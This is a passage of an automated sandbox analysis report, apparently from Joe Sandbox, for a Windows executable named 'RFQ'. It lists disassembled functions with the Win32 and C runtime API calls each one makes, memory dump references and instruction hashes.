                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastacceptselect
                                                                          • String ID:
                                                                          • API String ID: 385091864-0
                                                                          • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                          • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                          • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                          • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                          Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                          • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                          • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                          • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                          Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                          • GetStockObject.GDI32(00000011), ref: 00430258
                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateMessageObjectSendShowStock
                                                                          • String ID:
                                                                          • API String ID: 1358664141-0
                                                                          • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                          • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                          • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                          • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                          Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                          • String ID:
                                                                          • API String ID: 2880819207-0
                                                                          • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                          • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                          • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                          • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                          Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                          • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                          • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                          • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                          • String ID:
                                                                          • API String ID: 357397906-0
                                                                          • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                          • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                          • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                          • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                          Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsplitpath.LIBCMT ref: 0043392E
                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                          • __wsplitpath.LIBCMT ref: 00433950
                                                                          • __wcsicoll.LIBCMT ref: 00433974
                                                                          • __wcsicoll.LIBCMT ref: 0043398A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                          • String ID:
                                                                          • API String ID: 1187119602-0
                                                                          • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                          • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                          • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                          • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                          Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1597257046-0
                                                                          • Opcode ID: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                                          • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                          • Opcode Fuzzy Hash: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                                          • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                          Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                          • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$Free__malloc_crt
                                                                          • String ID:
                                                                          • API String ID: 237123855-0
                                                                          • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                          • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                          • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                          • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                          Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyObject$IconWindow
                                                                          • String ID:
                                                                          • API String ID: 3349847261-0
                                                                          • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                          • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                          • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                          • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                          Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                          • String ID:
                                                                          • API String ID: 2223660684-0
                                                                          • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                          • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                          • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                          • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                          Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                          • LineTo.GDI32(?,?,?), ref: 00447326
                                                                          • EndPath.GDI32(?), ref: 00447336
                                                                          • StrokePath.GDI32(?), ref: 00447344
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                          • String ID:
                                                                          • API String ID: 2783949968-0
                                                                          • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                          • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                          • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                          • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                          Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                          • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                          • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                          • String ID:
                                                                          • API String ID: 2710830443-0
                                                                          • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                          • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                          • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                          • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                          Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                          • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                            • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                            • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                          • String ID:
                                                                          • API String ID: 146765662-0
                                                                          • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                          • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                          • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                          • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                          Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00472B63
                                                                          • GetDC.USER32(00000000), ref: 00472B6C
                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                          • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 2889604237-0
                                                                          • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                          • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                          • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                          • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                          Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00472BB2
                                                                          • GetDC.USER32(00000000), ref: 00472BBB
                                                                          • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                          • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDesktopDeviceReleaseWindow
